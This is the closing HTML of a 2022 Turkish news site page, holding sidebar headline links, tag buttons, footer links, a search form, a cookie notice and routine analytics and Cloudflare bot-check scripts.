    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/2022/11/kades_i_indiren_kadin_sayisi_4_milyonu_gecti_h201501_22470.jpg" alt="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/gundem/kades-i-indiren-kadin-sayisi-4-milyonu-gecti-h201501.html" title="KADES&#039;i indiren kadın sayısı 4 milyonu geçti" class="text-white-50">
          KADES&#039;i indiren kadın sayısı 4 milyonu geçti        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/2022/11/bakan_bilgin_den_asgari_ucrete_yuzde_50_zam_olur_mu_sorusuna_cevap_h201500_e7db0.jpg" alt="Bakan Bilgin&#039;den &#039;Asgari ücrete yüzde 50 zam olur mu?&#039; sorusuna cevap" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/ekonomi/bakan-bilgin-den-asgari-ucrete-yuzde-50-zam-olur-mu-h201500.html" title="Bakan Bilgin&#039;den &#039;Asgari ücrete yüzde 50 zam olur mu?&#039; sorusuna cevap" class="text-white-50">
          Bakan Bilgin&#039;den &#039;Asgari ücrete yüzde 50 zam olur mu?&#039; sorusuna cevap        </a>
      </h6>
    </div>
  </div>
  </div>
            <div class="col-4">
  <h5 class="first-word text-white text-uppercase">Popüler Haberler</h5>
  <div class="title-line mt-2 mb-3 bg-warning w-25"></div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/thumbs/2022/11/faik_cetiner_hincal_uluc_vefat_etti_h201079_e5330.jpg" alt="Faik Çetiner: &quot;Hıncal Uluç vefat etti&quot;" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/gundem/faik-cetiner-hincal-uluc-vefat-etti-h201079.html" title="Faik Çetiner: &quot;Hıncal Uluç vefat etti&quot;" class="text-white-50">
          Faik Çetiner: &quot;Hıncal Uluç vefat etti&quot;        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/thumbs/2022/11/kazada_hayatini_kaybeden_tolga_guleryuz_un_son_goruntusu_ortaya_cikti_h201127_5f0c8.jpg" alt="Kazada hayatını kaybeden Tolga Güleryüz&#039;ün son görüntüsü ortaya çıktı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/genel/kazada-hayatini-kaybeden-tolga-guleryuz-un-son-goruntusu-h201127.html" title="Kazada hayatını kaybeden Tolga Güleryüz&#039;ün son görüntüsü ortaya çıktı" class="text-white-50">
          Kazada hayatını kaybeden Tolga Güleryüz&#039;ün son görüntüsü ortaya çıktı        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/thumbs/2022/11/taksim_deki_teror_saldirisinda_bombaci_teroristin_plani_adim_adim_desifre_edildi_h200954_a8348.jpg" alt="Taksim&#39;deki terör saldırısında bombacı teröristin planı adım adım deşifre edildi" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/gundem/taksimdeki-teror-saldirisinda-bombaci-teroristin-plani-adim-adim-desifre-edildi-h200954.html" title="Taksim&#39;deki terör saldırısında bombacı teröristin planı adım adım deşifre edildi" class="text-white-50">
          Taksim&#39;deki terör saldırısında bombacı teröristin planı adım adım deşifre edildi        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png" data-src="https://www.gaste24.com/images/resize/100/105x68/haberler/thumbs/2022/11/cristiano_ronaldo_merakla_beklenen_emeklilik_duyurusunu_yapti_h200867_a765f.jpg" alt="Cristiano Ronaldo merakla beklenen emeklilik duyurusunu yaptı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.gaste24.com/spor/cristiano-ronaldo-merakla-beklenen-emeklilik-duyurusunu-yapti-h200867.html" title="Cristiano Ronaldo merakla beklenen emeklilik duyurusunu yaptı" class="text-white-50">
          Cristiano Ronaldo merakla beklenen emeklilik duyurusunu yaptı        </a>
      </h6>
    </div>
  </div>
  </div>
        </div>
        <div class="footer-tags text-center my-3">
      <a href="https://www.gaste24.com/haberleri/Avlu+ful+izle" title="Avlu ful izle" class="btn btn-outline-secondary btn-sm mb-2">#Avlu ful izle</a>
      <a href="https://www.gaste24.com/haberleri/Ali+Ko%C3%A7" title="Ali Koç" class="btn btn-outline-secondary btn-sm mb-2">#Ali Koç</a>
      <a href="https://www.gaste24.com/haberleri/ba%C5%9Fkanl%C4%B1k" title="başkanlık" class="btn btn-outline-secondary btn-sm mb-2">#başkanlık</a>
      <a href="https://www.gaste24.com/haberleri/%C4%B0lker+Aksum" title="İlker Aksum" class="btn btn-outline-secondary btn-sm mb-2">#İlker Aksum</a>
      <a href="https://www.gaste24.com/haberleri/Trabzonspor" title="Trabzonspor" class="btn btn-outline-secondary btn-sm mb-2">#Trabzonspor</a>
      <a href="https://www.gaste24.com/haberleri/D%C3%BCzce" title="Düzce" class="btn btn-outline-secondary btn-sm mb-2">#Düzce</a>
      <a href="https://www.gaste24.com/haberleri/mhp" title="mhp" class="btn btn-outline-secondary btn-sm mb-2">#mhp</a>
      <a href="https://www.gaste24.com/haberleri/sava%C5%9F" title="savaş" class="btn btn-outline-secondary btn-sm mb-2">#savaş</a>
      <a href="https://www.gaste24.com/haberleri/murat+y%C4%B1lmaz" title="murat yılmaz" class="btn btn-outline-secondary btn-sm mb-2">#murat yılmaz</a>
      <a href="https://www.gaste24.com/haberleri/d+grubu" title="d grubu" class="btn btn-outline-secondary btn-sm mb-2">#d grubu</a>
      <a href="https://www.gaste24.com/haberleri/estetik" title="estetik" class="btn btn-outline-secondary btn-sm mb-2">#estetik</a>
      <a href="https://www.gaste24.com/haberleri/Kanal+%C4%B0stanbul" title="Kanal İstanbul" class="btn btn-outline-secondary btn-sm mb-2">#Kanal İstanbul</a>
      <a href="https://www.gaste24.com/haberleri/Kfar+Kama" title="Kfar Kama" class="btn btn-outline-secondary btn-sm mb-2">#Kfar Kama</a>
      <a href="https://www.gaste24.com/haberleri/emisyon" title="emisyon" class="btn btn-outline-secondary btn-sm mb-2">#emisyon</a>
      <a href="https://www.gaste24.com/haberleri/kemer" title="kemer" class="btn btn-outline-secondary btn-sm mb-2">#kemer</a>
      <a href="https://www.gaste24.com/haberleri/Caroline+Hurndall" title="Caroline Hurndall" class="btn btn-outline-secondary btn-sm mb-2">#Caroline Hurndall</a>
      <a href="https://www.gaste24.com/haberleri/%C3%B6rg%C3%BCtsel+eylem" title="örgütsel eylem" class="btn btn-outline-secondary btn-sm mb-2">#örgütsel eylem</a>
      <a href="https://www.gaste24.com/haberleri/Tevfik+G%C3%B6ksu" title="Tevfik Göksu" class="btn btn-outline-secondary btn-sm mb-2">#Tevfik Göksu</a>
      <a href="https://www.gaste24.com/haberleri/Garry" title="Garry" class="btn btn-outline-secondary btn-sm mb-2">#Garry</a>
      <a href="https://www.gaste24.com/haberleri/e%C5%9F" title="eş" class="btn btn-outline-secondary btn-sm mb-2">#eş</a>
  </div>
        <div class="text-center">
                        <a href="https://itunes.apple.com/tr/app/haber-sistemi/id1437135945" target="_blank" title="App Store">
                <img class="img-fluid lazyload rounded" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                    data-src="https://www.gaste24.com/_themes/hs-elegant/images/apple.png" alt="App Store" width="125">
            </a>
                                    <a href="https://play.google.com/store/apps/details?id=com.gaste24.com" target="_blank" title="Google Play">
                <img class="img-fluid lazyload rounded" src="https://www.gaste24.com/_themes/hs-elegant/images/space.png"
                    data-src="https://www.gaste24.com/_themes/hs-elegant/images/google-play.png" alt="Google Play" width="125">
            </a>
                    </div>
    </div>
</div>
<div id="footer-copyright" class="bg-dark py-3">
  <div class="container text-white">
    <div class="row">
      <div class="col-auto">
        Copyright &copy;
        2022        <br/>Her hakkı saklıdır. Haber Yazılımı: <a href="https://www.tebilisim.com" title="haber yazılımı, haber scripti, haber sistemi" target="_blank" class="text-white">TE Bilişim</a>      </div>
      <div class="col text-right">

        <a class="text-white pl-2 ml-2" href="https://www.gaste24.com/kullanim-kosullari-s3.html" title="Kullanım Koşulları">Kullanım Koşulları</a> |

                  <a class="text-white pl-2 ml-2 border-left" href="https://www.gaste24.com/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" title="Gizlilik Politikası">Gizlilik Politikası</a>
         |

        <a class="text-white pl-2 ml-2" href="https://www.gaste24.com/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni">Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni</a> |

        <a class="text-white pl-2 ml-2" href="https://www.gaste24.com/cerez-politikamiz-s7.html" title="Çerez Politikamız">Çerez Politikamız</a> |

      
        <a class="text-white pl-2 ml-2" href="https://www.gaste24.com/kunye.html" title="Künye">Künye</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.gaste24.com/iletisim.html" title="İletişim">İletişim</a>
        <a class="text-white pl-2 ml-2 border-left" target="_blank" href="https://www.gaste24.com/rss/" title="RSS">RSS</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.gaste24.com/sitene-ekle.html" title="Sitene Ekle">Sitene Ekle</a>
      </div>
    </div>
  </div>
</div>
    <div id="search" class="position-fixed w-100 h-100">
  <div class="close">Kapat</div>
  <form action="https://www.gaste24.com/" method="get" class="p-3 position-absolute">
    <h3 class="text-light pb-2">Sitede Ara</h3>
    <div class="form-row">
      <div class="col-10">
        <input type="hidden" name="m" value="arama">
        <input name="q" type="search" class="form-control form-control-lg" placeholder="Sitede aramak için bir kelime yazın ve Enter'a basın." required>
        <input type="hidden" name="auth" value="6b7df084ce42b80a540e54e67449c4db89da953a" />
      </div>
      <div class="col-2"><button type="submit" class="btn btn-primary btn-block btn-lg text-uppercase">Ara</button></div>
    </div>
        <div class="text-center my-3">
              <a href="https://www.gaste24.com/haberleri/Avlu+ful+izle" title="Avlu ful izle" class="btn btn-outline-secondary btn-sm mb-2">#Avlu ful izle</a>
              <a href="https://www.gaste24.com/haberleri/Ali+Ko%C3%A7" title="Ali Koç" class="btn btn-outline-secondary btn-sm mb-2">#Ali Koç</a>
              <a href="https://www.gaste24.com/haberleri/ba%C5%9Fkanl%C4%B1k" title="başkanlık" class="btn btn-outline-secondary btn-sm mb-2">#başkanlık</a>
              <a href="https://www.gaste24.com/haberleri/%C4%B0lker+Aksum" title="İlker Aksum" class="btn btn-outline-secondary btn-sm mb-2">#İlker Aksum</a>
              <a href="https://www.gaste24.com/haberleri/Trabzonspor" title="Trabzonspor" class="btn btn-outline-secondary btn-sm mb-2">#Trabzonspor</a>
              <a href="https://www.gaste24.com/haberleri/D%C3%BCzce" title="Düzce" class="btn btn-outline-secondary btn-sm mb-2">#Düzce</a>
              <a href="https://www.gaste24.com/haberleri/mhp" title="mhp" class="btn btn-outline-secondary btn-sm mb-2">#mhp</a>
              <a href="https://www.gaste24.com/haberleri/sava%C5%9F" title="savaş" class="btn btn-outline-secondary btn-sm mb-2">#savaş</a>
              <a href="https://www.gaste24.com/haberleri/murat+y%C4%B1lmaz" title="murat yılmaz" class="btn btn-outline-secondary btn-sm mb-2">#murat yılmaz</a>
              <a href="https://www.gaste24.com/haberleri/d+grubu" title="d grubu" class="btn btn-outline-secondary btn-sm mb-2">#d grubu</a>
              <a href="https://www.gaste24.com/haberleri/estetik" title="estetik" class="btn btn-outline-secondary btn-sm mb-2">#estetik</a>
              <a href="https://www.gaste24.com/haberleri/Kanal+%C4%B0stanbul" title="Kanal İstanbul" class="btn btn-outline-secondary btn-sm mb-2">#Kanal İstanbul</a>
              <a href="https://www.gaste24.com/haberleri/Kfar+Kama" title="Kfar Kama" class="btn btn-outline-secondary btn-sm mb-2">#Kfar Kama</a>
              <a href="https://www.gaste24.com/haberleri/emisyon" title="emisyon" class="btn btn-outline-secondary btn-sm mb-2">#emisyon</a>
              <a href="https://www.gaste24.com/haberleri/kemer" title="kemer" class="btn btn-outline-secondary btn-sm mb-2">#kemer</a>
              <a href="https://www.gaste24.com/haberleri/Caroline+Hurndall" title="Caroline Hurndall" class="btn btn-outline-secondary btn-sm mb-2">#Caroline Hurndall</a>
              <a href="https://www.gaste24.com/haberleri/%C3%B6rg%C3%BCtsel+eylem" title="örgütsel eylem" class="btn btn-outline-secondary btn-sm mb-2">#örgütsel eylem</a>
              <a href="https://www.gaste24.com/haberleri/Tevfik+G%C3%B6ksu" title="Tevfik Göksu" class="btn btn-outline-secondary btn-sm mb-2">#Tevfik Göksu</a>
              <a href="https://www.gaste24.com/haberleri/Garry" title="Garry" class="btn btn-outline-secondary btn-sm mb-2">#Garry</a>
              <a href="https://www.gaste24.com/haberleri/e%C5%9F" title="eş" class="btn btn-outline-secondary btn-sm mb-2">#eş</a>
          </div>
      </form>
</div>
    <div class="alert text-center cookiealert" role="alert">
    En iyi site deneyimi sağlamak için çerezlerden faydalanıyoruz. Sitemizi kullanmaya devam etmeniz gizlilik politikamızı kabul ettiğiniz anlamına gelmektedir.    <a class="text-white" href="https://www.gaste24.com/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" target="_blank">Detaylar</a>
    <button type="button" class="btn btn-info btn-sm acceptcookies" aria-label="Kapat">
        Tamam    </button>
</div>



<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "Organization",
    "url": "https:\/\/www.gaste24.com\/",
    "contactPoint": {
        "@type": "ContactPoint",
        "contactType": "customer service",
        "telephone": "+90 0216 339 45 45"
    },
    "logo": {
        "@type": "ImageObject",
        "url": "https:\/\/www.gaste24.com\/images\/banner\/gaste-logo-44.png",
        "width": 161,
        "height": 62
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "WebSite",
    "url": "https:\/\/www.gaste24.com\/",
    "potentialAction": {
        "@type": "SearchAction",
        "target": "https:\/\/www.gaste24.com\/haberleri\/{search_term_string}",
        "query-input": "required name=search_term_string"
    }
}</script>
<script type="application/ld+json">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</script>
<script>
var ELEGANT = {"settings":{"theme_path":"https:\/\/www.gaste24.com\/_themes\/hs-elegant\/","ajax_url":"_ajax\/","site_url":"https:\/\/www.gaste24.com\/","theme":"hs-elegant","analytics":"UA-118642121-2","comment_approved":0,"theme_version":"1.0.5","system_version":"5.11","popup_time":"1","language":"tr","module":"haber","save":true,"follow":false,"id":201501,"category":false}},
    $infinityContainer, _lang = {"unauthorized":"Bu i\u015flemi yapabilmek i\u00e7in \u00fcye giri\u015fi yapmal\u0131s\u0131n\u0131z!","new_notification":"Yeni bildirimleriniz var!","unsave":"Kaydedildi","save":"Kaydet","not_saved_items":"Hen\u00fcz kaydedilmi\u015f bir haber bulunmuyor!","sure_saved_delete":"\u0130\u00e7erik kay\u0131t listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","sure_unfollow":":string takip listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","follow":"Takip Et","unfollow":"Takip ediyorsunuz","password_length":"Yeni parolan\u0131z en az 6 haneli olmal\u0131d\u0131r!","delete":"Sil","read_more":"Devam\u0131n\u0131 oku","close":"Kapat","max_image_error":"En fazla 8 resim ekleyebilirsiniz!","comment_polled":"Daha \u00f6nce bu yorumu oylad\u0131n\u0131z!","email_required":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_invalid":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_saved":"E-posta adresiniz b\u00fclten listesine eklenmi\u015ftir!","duplicate_email":"E-posta adresi zaten kay\u0131tl\u0131!","yes":"Evet","cancel":"Vazge\u00e7"};
</script>
<script src="https://www.gaste24.com/_themes/hs-elegant/script/bundle.min.js?v=1.1"></script>
<script>
function tebilisim(id, module, page, count_format) {
    $.get(ELEGANT.settings.site_url + '_ajax/tebilisim.php?id=' + id + '&m=' + module + '&page=' + page +
        '&count_format=k',
        function(hit) {
            $(".hitCounter-" + id).html(hit);
        });
}
tebilisim('201501', 'haber',
    '');
</script>
<script>
$(document).ready(function() {
    if($('#title-bar').length > 0) { 
        if($('#left-ad').length > 0) {
            $('#left-ad').css('top',$('#left-ad')[0].offsetTop + 38 + 'px'); 
        } 
        if($('#right-ad').length > 0) {
            $('#right-ad').css('top',$('#right-ad')[0].offsetTop + 38 + 'px'); 
        }
    }
    $('#userAccount a[data-toggle="tab"]').on('show.bs.tab', function(e) {
        localStorage.setItem('activeTab', $(e.target).attr('href'));
    });
    var activeTab = localStorage.getItem('activeTab');
    if (activeTab) {
        $('#userAccount a[href="' + activeTab + '"]').tab('show');
    }
});
</script>
<script>
    $(document).ready(function(){
        if(getCookie('panelshow')=="show"){
            $("#panel-bar").removeClass('d-none');
        }else{
            $("#panel-bar").remove();
        }
    });
</script>




<script>
if ($infinityContainer) {
    $infinityContainer.on('history.infiniteScroll', function(event, title, path) {
        gtag('config', ELEGANT.settings.analytics, {
            'page_path': window.location.pathname
        });
    });
}
</script>

<!-- Yandex.Metrika counter -->
<script type="text/javascript">
(function(m, e, t, r, i, k, a) {
    m[i] = m[i] || function() {
        (m[i].a = m[i].a || []).push(arguments)
    };
    m[i].l = 1 * new Date();
    k = e.createElement(t), a = e.getElementsByTagName(t)[0], k.async = 1, k.src = r, a.parentNode.insertBefore(k,
        a)
})
(window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

ym("55031506", "init", {
    clickmap: true,
    trackLinks: true,
    accurateTrackBounce: true,
    webvisor: true
});
</script>
<noscript>
    <div><img src="https://mc.yandex.ru/watch/55031506" style="position:absolute; left:-9999px;"
            alt="" /></div>
</noscript>
<!-- /Yandex.Metrika counter -->













<script>(function(){var js = "window['__CF$cv$params']={r:'76fa971dc8f482aa',m:'nA.l1ZmyapoC0mO1QP9pnMi5quQg0PcDVmQZf8kMtQg-1669381469-0-ATuR107cOq2WIGUt6QPfLs7qOEZWJnal2InqoRq7KQtYJUABIW1PZaRNkYV6lj6GGsZ1LvURUamTvVsyW9qAQQoYdvtyPOxvdrBr7hjY02n3YiyDfRdS+yGv8FnGN2xkbGGKSZQHktMRv2ndRsvd2N4dzgJR6PkSsedLvLoVwSVFS3+hsOoQKwdG2KFN6klwjpRsA9DYi4IhlRrLps/1M7s=',s:[0x2f35accc33,0xec37b67292],u:'/cdn-cgi/challenge-platform/h/b'};var now=Date.now()/1000,offset=14400,ts=''+(Math.floor(now)-Math.floor(now%offset)),_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/h/b/scripts/alpha/invisible.js?ts='+ts,document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.nonce = '';_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body>

</html>
